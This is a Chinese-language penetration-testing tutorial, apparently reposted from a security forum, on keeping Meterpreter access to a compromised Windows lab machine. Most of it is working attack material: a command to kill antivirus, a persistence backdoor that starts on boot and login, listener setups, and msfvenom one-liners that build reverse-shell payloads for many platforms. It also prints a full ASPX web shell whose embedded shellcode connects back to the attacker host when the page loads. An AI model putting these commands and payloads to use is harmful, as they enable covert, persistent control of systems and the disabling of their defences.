meterpreter后渗透之权限维持

2019-08-14 约 1107 字 预计阅读 3 分钟

声明:本文 【meterpreter后渗透之权限维持】 由作者 FFMG 于 2019-08-14 07:36:00 首发 先知社区 曾经 浏览数 27 次

感谢 FFMG 的辛苦付出!

攻击机:192.168.85.130
目标机win7:192.168.85.131

Persistence后门


使用此方法建议运行前关闭杀毒软件

Run post/windows/manage/killav

输入run persistence -S -U -X -i 5 -p 6666 -r 192.168.85.130创建一个持久性的后门。

参数解释如下:

-A 自动启动一个匹配的漏洞/多/处理程序来连接到代理
-L 如果不使用%TEMP%,则选择目标主机中写入有效负载的>位置。
-P 有效载荷使用,默认是windows/meterpreter/reverse_tcp。
-S 在启动时自动启动代理作为服务(具有系统特权)
-T 选择要使用的可执行模板
-U 用户登录时自动启动代理
-X 在系统启动时自动启动代理
-h 这个帮助菜单
-i 每次连接尝试之间的间隔(以秒为单位)
-p 运行Metasploit的系统正在监听的端口
-r 运行Metasploit的系统的IP监听连接返回

可以发现在目标机C:\Windows\TEMP下创建了一个QeVoiKqW.vbs文件

后使用以下命令设置监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.85.130
set lport 6666
run

即可看见已经建立了连接,
持久后门已经创建成功。

Meterpreter 后门


  • 通过msfvenom工具制作PHP Meterpreter
  • 生成的shuteer.php如图所示。
  • 然后将shuteer.php上传到目标服务器。
  • 设置监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.85.130
set lport 6666
run

  • 然后打开/xxx/xxx/shuteer.php文件

    即可看见已经建立了连接,
    后门已经创建成功

通过msfvenom工具制作exe Meterpreter



可以看见创建了一个test.exe文件

然后使用各种方法,将其放入目标机下运行。
一样的设置监听。

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.85.130
run


后门建立成功。
生成其他格式的木马。

安卓app:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.85.130 LPORT=6666 -o ~/Desktop/test2.apk  
Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.85.130 LPORT=6666 -f  elf > shell.elf
Mac:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.85.130 LPORT=6666 -f macho >  shell.macho
PHP:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.20.27 LPORT=4444 -f raw -o test.php
ASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.85.130 LPORT=6666  -f asp >   shell.asp
ASPX:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.85.130 LPORT=6666  -f  aspx > shell.aspx
JSP:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.85.130 LPORT=6666 -f  raw > shell.jsp
Bash:
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.85.130 LPORT=6666 -f   raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=192.168.85.130 LPORT=6666 -f raw > shell.pl
Python
msfvenom -p python/meterpreter/reverser_tcp LHOST=192.168.85.130 LPORT=6666 -f   raw > shell.py

Aspx meterpreter后门


使用以下命令调用模块

use windows/shell_reverse_tcp
set lhost 192.168.85.130
set lport 4444

后使用generate -h 查看帮助

使用generate -t aspx
生成aspx版的·shellcode

生成的内容保存为test.aspx,后上传到服务器。

<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.IO" %>
<script runat="server">
    private static Int32 MEM_COMMIT=0x1000;
    private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;

    [System.Runtime.InteropServices.DllImport("kernel32")]
    private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);

    [System.Runtime.InteropServices.DllImport("kernel32")]
    private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,UIntPtr dwStackSize,IntPtr lpStartAddress,IntPtr param,Int32 dwCreationFlags,ref IntPtr lpThreadId);

    protected void Page_Load(object sender, EventArgs e)
    {
        byte[] kO5ZWrqTUQK = new byte[324] {
0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,
0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,
0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,
0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,
0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,
0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,
0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,
0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xc0,0xa8,0x55,0x82,0x68,0x02,0x00,0x11,0x5c,0x89,
0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,
0x56,0xff,0xd5,0x68,0x63,0x6d,0x64,0x00,0x89,0xe3,0x57,0x57,0x57,0x31,0xf6,0x6a,0x12,0x59,0x56,0xe2,0xfd,0x66,0xc7,0x44,0x24,
0x3c,0x01,0x01,0x8d,0x44,0x24,0x10,0xc6,0x00,0x44,0x54,0x50,0x56,0x56,0x56,0x46,0x56,0x4e,0x56,0x56,0x53,0x56,0x68,0x79,0xcc,
0x3f,0x86,0xff,0xd5,0x89,0xe0,0x4e,0x56,0x46,0xff,0x30,0x68,0x08,0x87,0x1d,0x60,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x68,0xa6,
0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x53,0xff,0xd5 };

        IntPtr nQcMoqDC = VirtualAlloc(IntPtr.Zero,(UIntPtr)kO5ZWrqTUQK.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
        System.Runtime.InteropServices.Marshal.Copy(kO5ZWrqTUQK,0,nQcMoqDC,kO5ZWrqTUQK.Length);
        IntPtr cwFgqH = IntPtr.Zero;
        IntPtr bVttlgPyy = CreateThread(IntPtr.Zero,UIntPtr.Zero,nQcMoqDC,IntPtr.Zero,0,ref cwFgqH);
    }
</script>

设置监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.85.130
set lport 6666
run

接着在网站上访问test.aspx的文件.发现服务端反弹成功

关键词:[‘渗透测试’, ‘渗透测试’]


author

旭达网络

旭达网络技术博客,曾记录各种技术问题,一贴搞定.
本文采用知识共享署名 4.0 国际许可协议进行许可。

We notice you're using an adblocker. If you like our webite please keep us running by whitelisting this site in your ad blocker. We’re serving quality, related ads only. Thank you!

I've whitelisted your website.

Not now